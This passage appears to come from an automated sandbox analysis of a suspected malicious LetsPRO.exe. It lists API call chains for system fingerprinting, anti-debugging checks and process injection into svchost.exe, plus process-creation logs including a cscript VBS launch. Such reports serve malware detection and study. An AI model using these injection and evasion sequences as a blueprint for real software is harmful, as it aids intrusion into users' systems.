t,___time64_t_from_ft,wcscpy_s,__invoke_watson,5_2_6C94DFA9
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F945 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F945
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DAA8 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,5_2_6C94DAA8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F48B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F48B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94D56F _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,5_2_6C94D56F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C951054 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C951054
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F051 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F051
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00254318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,8_2_00254318
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00265490 FindFirstFileExW,8_2_00265490
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001CBAB FindFirstFileExW,16_2_0001CBAB
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012DB25 FindFirstFileExW,30_2_0012DB25
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDB6417 FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose,30_2_6CDB6417
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC98E75 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose,30_2_6CC98E75
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC98FBC GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,30_2_6CC98FBC
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9ED9F FindFirstFileW,FindNextFileW,FindClose,30_2_6CC9ED9F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9AA6F FindFirstFileW,FindNextFileW,FindClose,30_2_6CC9AA6F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCCA66F FindFirstFileW,FindClose,FindNextFileW,30_2_6CCCA66F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC98D3E FindFirstFileW,FindNextFileW,GetLastError,FindClose,30_2_6CC98D3E
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F380F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_03F380F0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F35430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03F35430
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: LetsPRO.exe, 00000004.00000002.3261617800.0000000000614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsth
                  Source: GoogleUpdate.exe, 0000001E.00000002.3261720735.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2421148026.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000002.3262321367.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: GoogleUpdate.exe, 0000001E.00000003.2421148026.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000002.3262321367.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSystem information queried: KernelDebuggerInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_025F8667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_025F8667
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9667A CreateFileW,GetFileAttributesExW,OutputDebugStringW,CloseHandle,GetLastError,WriteFile,30_2_6CC9667A
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C976D54 VirtualProtect ?,-00000001,00000104,?5_2_6C976D54
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F37490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,4_2_03F37490
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_004012C0 mov eax, dword ptr fs:[00000030h]4_2_004012C0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_004012D1 mov eax, dword ptr fs:[00000030h]4_2_004012D1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00265217 mov eax, dword ptr fs:[00000030h]8_2_00265217
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025EDE2 mov eax, dword ptr fs:[00000030h]8_2_0025EDE2
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001900A mov ecx, dword ptr fs:[00000030h]16_2_0001900A
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001DE65 mov eax, dword ptr fs:[00000030h]16_2_0001DE65
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012D8C7 mov eax, dword ptr fs:[00000030h]30_2_0012D8C7
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012C11B mov ecx, dword ptr fs:[00000030h]30_2_0012C11B
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDEFAB3 mov eax, dword ptr fs:[00000030h]30_2_6CDEFAB3
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_00401244 GetProcessHeap,RtlAllocateHeap,4_2_00401244
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_025F8667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_025F8667
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F3DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,4_2_03F3DF10
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F3F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_03F3F00A
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F41F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_03F41F67
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C97AEE4 _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,5_2_6C97AEE4
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C900837 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,5_2_6C900837
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C97C24F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,5_2_6C97C24F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258A28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00258A28
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025DAD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0025DAD2
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258E32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00258E32
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258FC5 SetUnhandledExceptionFilter,8_2_00258FC5
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_000158B2 SetUnhandledExceptionFilter,16_2_000158B2
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_00015B6F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00015B6F
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001C4FA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0001C4FA
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001571F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0001571F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_00127825 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00127825
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012755D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_0012755D
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_001279BB SetUnhandledExceptionFilter,30_2_001279BB
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012BA61 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0012BA61
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC21B3 FreeLibrary,FreeLibrary,FreeLibrary,EnterCriticalSection,SetUnhandledExceptionFilter,__set_purecall_handler,_Deallocate,LeaveCriticalSection,RtlDeleteCriticalSection,ReleaseSemaphore,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,RtlDeleteCriticalSection,CloseHandle,CloseHandle,RtlDeleteCriticalSection,30_2_6CDC21B3
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC1F0D CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,__set_purecall_handler,LeaveCriticalSection,30_2_6CDC1F0D
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDD6B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_6CDD6B01
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC2443 SetUnhandledExceptionFilter,__set_purecall_handler,LeaveCriticalSection,30_2_6CDC2443
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDD6737 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_6CDD6737
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC23D6 EnterCriticalSection,SetUnhandledExceptionFilter,__set_purecall_handler,30_2_6CDC23D6
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDDCEFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_6CDDCEFC

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F377E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_03F377E0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe4_2_03F377E0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe4_2_03F377E0
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9975D SetForegroundWindow,ShellExecuteExW,AllowSetForegroundWindow,GetLastError,SetLastError,GetLastError,DestroyWindow,SetLastError,30_2_6CC9975D
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
                  Source: C:\Program Files (x86)\ChromeSetup.exeProcess created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe c:\windows\systemtemp\gumbc12.tmp\googleupdate.exe /installsource taggedmi /install "appguid={8a69d345-d564-463c-aff1-a69d9e530f96}&iid={852d075a-cb9d-6360-4e4d-427bbb4f11e1}&lang=zh-cn&browser=3&usagestats=1&appname=google%20chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC97C7F GetSecurityDescriptorDacl,SetSecurityDescriptorDacl,30_2_6CC97C7F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA3BF4 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,30_2_6CCA3BF4
                  Source: LetsPRO.exe, 00000004.00000003.2865605230.0000000005023000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2865471845.0000000005023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Manager
                  Source: LetsPRO.exe, 00000004.00000002.3274006003.0000000005023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                  Source: LetsPRO.exe, 00000004.00000003.3238092510.0000000005023000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.3043194092.0000000005023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Managert
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258C8B cpuid 8_2_00258C8B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03F35430
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,5_2_6C9088CA
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,free,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,_malloc_crt,_malloc_crt,free,__recalloc_crt,__recalloc_crt,_strlen,_calloc_crt,_strlen,strcpy_s,SetEnvironmentVariableA,_errno,free,free,__invoke_watson,5_2_6C9084A8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,5_2_6C9085EC
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,5_2_6C906630
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,5_2_6C90875C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6C97F4C7
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage,5_2_6C97F407
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6C97F52E
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_6C97F1DB
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,5_2_6C97F134
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage,5_2_6C97F236
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: EnumSystemLocalesW,8_2_00268096
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: EnumSystemLocalesW,8_2_002680E1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: EnumSystemLocalesW,8_2_0026817C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW,8_2_0026219D
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00268207
